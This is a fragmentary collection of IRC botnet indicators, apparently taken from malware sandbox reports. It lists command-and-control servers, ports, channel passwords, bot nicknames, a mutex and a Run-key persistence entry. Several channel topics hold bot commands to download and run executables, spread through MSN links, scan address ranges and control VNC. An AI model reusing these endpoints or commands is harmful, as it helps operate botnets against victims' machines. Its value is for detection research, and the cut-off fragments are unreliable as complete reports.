layerz.zapto.org

layerz.zapto.org 187.39.72.57 C&C Server: 187.39.72.57:6667 Server Password: Username: KCA Nickname: [SEH][exploiters]|LAN|72288] Channel: #nes (Password: ) Channeltopic: layerz.zapto.org 187.39.72.57 C&C Server: 187.39.72.57:6667 Server Password: Username: XP-9534 Nickname: [DEU|00|P|65156] Channel: #bots (Password: ) Channeltopic: C&C Server: 187.39.72.57:6667 Server Password: Username: XP-8377 Nickname: [DEU|00|P|42858] Channel: #bots (Password: ) Channeltopic: C&C Server: 187.39.72.57:6667 Server Password: Username: ztyekd Nickname: DEU|23255

75.102.24.35

Remote Host Port Number 204.0.5.40 80 204.0.5.41 80 204.0.5.42 80 204.0.5.48 80 204.0.5.51 80 204.0.5.56 80 204.0.5.57 80 207.46.148.31 80 63.135.80.58 80 63.135.86.25 80 75.102.24.35 1234 PASS xxx ircd here NICK NEW-[USA|00|P|83449] USER XP-3848 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|83449] -ix JOIN #jakarta test PONG irc.priv8net.com * The data identified by the following URLs was then

voip.pbxcalls.net

voip.pbxcalls.net 216.246.77.59 update.articlesdealing.com 74.86.97.166 74.86.97.166 74.86.97.166 Download URLs http://74.86.97.166/check.php (update.articlesdealing.com) * C&C Server: 216.246.77.59:1234 * Server Password: * Username: XP-3567 * Nickname: NEW-[DEU|00|P|61915] * Channel: #jakarta (Password: test) * Channeltopic: :.m.s|.m.e fotooo.. 😀 http://www.lmg-space.com/image.php?= C&C Server: 213.154.225.135:1234 Server Password: Username: XP-2815 Nickname: NEW-[DEU|00|P|99091] Channel: #jakarta (Password: test) Channeltopic: :.s|.m.s|.m.e cool foto.. 😀 http://pic-imagesfb.com/photos.php?= Outgoing connection

nope.nerashti.net

Remote Host Port Number nope.nerashti.net 81 NICK [USA|XP]2405738 USER s “” “lol” :s JOIN #newnew# NICK [USA|XP]6710820 NICK n[USA|XP]0692699 Now talking in #newnew# Topic On: [ #newnew# ] [ ] Topic By: [ Burimi ] * To mark the presence in the system, the following Mutex object was created: o 3d6g7v5x2f4as7 * The following ports

irc-seh.sytes.net

irc-seh.sytes.net 187.39.73.13 C&C Server: 187.39.73.13:6667 Server Password: Username: XP-3475 Nickname: [DEU|00|P|78446] Channel: #bots (Password: ) Channeltopic: :.msn.msg Conhesse Isso ?!?!? http://layerz.zapto.org:8090/megaxpl/scan7.exe irc-seh.sytes.net 187.39.73.13 Opened listening TCP connection on port: 15626 C&C Server: 187.39.73.13:6667 Server Password: Username: sadbsqzr Nickname: [nLh-VNC]ncmrks Channel: #vnc (Password: ) Channeltopic: :!vncstop !scan 94 1 201.x.x.x 3 1 189.x.x.x Outgoing connection to

stores.dellhp.net

stores.dellhp.net (1234) Looking up your hostname Server:Found your hostname Server Statistics: Server : 2.priv8net.com [Crew] Created : UserModes : ChanModes : NEW-[USA|00|P|43832] Protocols : NEW-[USA|00|P|43832] Protocols : NEW-[USA|00|P|43832] Protocols : MOTD File is missing UserMode: set mode +G, modes are now [+G] * Pdcc is on * IAL is on possible chanels: #!help! and #jakarta

oled.vaiosys.com

browseusers.myspace.com browseusers.myspace.com 216.178.38.168 x.myspacecdn.com x.myspacecdn.com 212.201.100.176 myspace.ivwbox.de myspace.ivwbox.de 193.46.63.103 cms.myspacecdn.com cms.myspacecdn.com 212.201.100.169 www.google-analytics.com www.google-analytics.com 72.14.221.101 js.myspacecdn.com js.myspacecdn.com 212.201.100.169 qs.ivwbox.de qs.ivwbox.de 193.46.63.90 pagead2.googlesyndication.com pagead2.googlesyndication.com 209.85.129.167 googleads.g.doubleclick.net googleads.g.doubleclick.net 209.85.129.154 b.myspace.com c3.ac-images.myspacecdn.com c3.ac-images.myspacecdn.com 212.201.100.142 c1.ac-images.myspacecdn.com c1.ac-images.myspacecdn.com 212.201.100.142 c2.ac-images.myspacecdn.com c2.ac-images.myspacecdn.com 212.201.100.133 c4.ac-images.myspacecdn.com c4.ac-images.myspacecdn.com 212.201.100.135 b.myspace.com 216.178.38.103 delb.opt.fimserve.com desk.opt.fimserve.com delb.opt.fimserve.com 63.135.86.37 desk.opt.fimserve.com 63.135.86.25 adserver.adtech.de adserver.adtech.de 194.117.224.90 ad-emea.doubleclick.net ad-emea.doubleclick.net 209.85.129.148 ad.zanox.com

moves.vaiosys.com(32k net)

moves.vaiosys.com DNS_TYPE_A 173.203.112.32 Resolved : [moves.vaiosys.com] To [173.204.76.243] Resolved : [moves.vaiosys.com] To [173.203.112.32] Resolved : [moves.vaiosys.com] To [173.203.119.135] Resolved : [moves.vaiosys.com] To [173.204.76.244] 173.203.112.32:81 Nick: n[AUT|XP]8864072 Username: s Joined Channel: #newgen# Joined Channel: #DEU Channel Topic for Channel #DEU: “.dl http://mirc.fb-photos.net/install.52081.exe” Channel Topic for Channel #newgen#: “.st” .im http://tinyurl.com/pict2010-05-05n other chanels: #BRA #NOR #DEU #USA

199.71.214.54

Remote Host Port Number 199.71.214.54 8160 NICK {USA-XP}822917 MODE {USA-XP}822917 -ix JOIN #Test1# USER kztgfpt * 0 :COMPUTERNAME PRIVMSG #Test1# : NEW MoFkN WebGrab! Other details * The following port was open in the system: Port Protocol Process 1052 TCP svhost.exe (%Windir%svhost.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + MSN